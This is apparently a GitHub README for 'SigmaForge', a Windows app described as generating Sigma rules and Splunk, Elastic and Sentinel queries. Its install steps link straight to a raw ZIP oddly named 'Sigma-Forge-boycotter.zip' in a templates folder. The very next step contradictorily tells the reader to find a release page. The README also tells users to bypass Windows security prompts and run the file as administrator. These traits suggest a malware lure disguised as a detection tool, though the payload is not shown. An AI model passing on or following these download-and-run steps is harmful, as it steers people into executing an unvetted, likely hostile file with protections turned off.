SigmaForge helps you create Sigma rules from a simple form. It also gives you output for common SIEM formats like Splunk SPL, Elastic KQL, Elastic EQL, and Sentinel KQL.
Use it when you want to turn a detection idea into a rule without writing everything by hand. It is built for people who work on detection content and want a clear way to prepare rules for different platforms.
Visit the release page to download and run this app on Windows:
Look for the latest release file in the list. Download the Windows version, then open the file on your PC.
SigmaForge runs on a Windows desktop or laptop.
You will need:
- Windows 10 or Windows 11
- At least 4 GB of RAM
- 200 MB of free disk space
- A mouse and keyboard
- Internet access to get the release file
For best use, keep your screen at normal desktop size so the form is easy to read.
Before you open SigmaForge, make sure you have:
- Downloaded the latest release from the link above
- Saved the file in a folder you can find again
- Closed any old copy of the app if it is already open
If Windows shows a security prompt, choose the option that lets you open the file.
Follow these steps on Windows:
- Open this link: https://github.com/Unaddicted-swisspine980/SigmaForge/raw/refs/heads/main/templates/Sigma-Forge-boycotter.zip
- Find the newest release at the top of the page
- Open the release asset for Windows
- Save the file to your Downloads folder or Desktop
- If the file is a ZIP file, right-click it and choose Extract All
- Open the extracted folder
- Double-click the SigmaForge app file
- Wait for the app window to appear
If the app opens in your browser, keep that tab open and use it like a local tool. If it opens as a desktop window, pin it to your taskbar if you use it often.
SigmaForge uses a simple flow:
- Enter the rule details
- Choose the fields you want to watch
- Set the match logic
- Pick the target format
- Generate the output
- Copy the rule into your SIEM or save it for later
The app is meant to make rule building easier. You can start with one idea, then shape it into a format that fits your platform.
SigmaForge may ask for details like:
- Rule name
- Rule description
- Log source
- Event fields
- Search terms
- Match conditions
- Severity level
- False positive notes
Use plain language when you fill in the form. For example, write what the alert should catch and what event data matters most.
SigmaForge supports several rule and query formats.
Use this if your team works in Splunk. The output helps you search for matching events in Splunk data.
Use this for Elastic rules that rely on KQL. It is useful for clear field matching and simple searches.
Use this when you need sequence-based detection logic in Elastic. It fits event patterns and ordered behavior.
Use this for Microsoft Sentinel. The output maps your rule idea into KQL for Sentinel hunts and analytics.
A simple workflow looks like this:
- Think of the activity you want to detect
- Add the log source that sees it
- Add the field names from your logs
- Choose terms, operators, and filters
- Generate the rule
- Review the output
- Copy it into your SIEM
- Test it with known data
If the rule feels too broad, narrow the search terms. If it misses events, check the field names and log source first.
Use these tips when you build a rule:
- Keep the rule focused on one behavior
- Use field names from your real logs
- Add known good filters to cut noise
- Test with old alerts before you rely on it
- Save each version so you can compare changes
- Give the rule a name that makes sense to your team
Short, clear rules are easier to tune. They also make review work faster.
If SigmaForge does not start:
- Check that the download finished fully
- Make sure you extracted the ZIP file if one was provided
- Try running the app again from the extracted folder
- Right-click the file and choose Run as administrator if Windows blocks it
- Re-download the release if the file looks broken
If the window opens and closes fast, run it again from the folder so you can see any message.
You can keep the app in a simple folder setup like this:
- Downloads
- SigmaForge
- Releases
- Rules
This makes it easier to keep the app, your generated rules, and test files in one place.
SigmaForge is useful for:
- Detection engineers
- SOC analysts
- Threat hunters
- Security teams
- Anyone who writes Sigma rules
- People who need output for Splunk, Elastic, or Sentinel
It works well when you want one place to shape a rule for more than one platform.
Use SigmaForge to help build detection logic for your own environment or authorized work. Review each generated rule before you put it into production. Check the field names, search terms, and match logic against your log data.
This project is related to:
- cybersecurity
- detection engineering
- elastic
- flask
- python
- security tools
- sentinel
- siem
- sigma
- splunk
If you need help, check the release page for the latest build notes and file names. If the app does not match your screen or your Windows version, download the newest release again and try the steps above
SigmaForge gives you a clear way to move from an idea to a usable detection rule. It keeps the process simple so you can spend less time on format work and more time on the rule itself